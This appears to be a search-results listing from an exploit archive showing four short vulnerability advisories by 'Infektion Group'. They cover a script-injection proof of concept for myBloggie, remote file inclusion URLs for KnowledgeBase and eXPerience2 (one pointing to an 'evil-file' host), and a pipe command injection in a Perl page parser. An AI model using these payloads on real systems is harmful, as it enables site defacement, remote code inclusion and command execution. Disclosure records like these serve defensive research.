4 matches found
myBloggie 2.1.1
myBloggie 2.1.1 Vendor: http://www.mywebland.com/ When the comments are posted there's no check for "script" tags allowing a script injection attack. Proof of Concept scriptalert"Hi world!";/script ..-= DominusVis =-.. Infektion Group Brazil...
KnowledgeBase
Remote File Inclusion KnowledgeBase Vendor: www.activecampaign.com/kb/ Well, inside the index.php file we can see: if $page == "" $page = "startup"; @include"$page.php"; ? After I tested some sites with kb I got file inclusion: http://www.site.com/kb/index.php?page=http://file DominusVis Infektio...
Multiples Vulnerabilities
Multiples Vulnerabilities Product: eXPerience2 I. Remote File Inclusion http://www.host-vulnerable.com/eXPerience2/modules.php?file=http://evil- file/ II. Full Path Disclosure http://www.host-vulnerable.com/eXPerience2/modules.php Thank you very match :D Infektion Group irc.gigachat.net infektion...
wdExec.txt
Williams Database Page Parser File: page.pl Version: 1.0 Author: Neil Thompson Web: www.williamsdb.com Exploit: www.host.com/page.pl?page=|id| ThankS All : Infektion Group...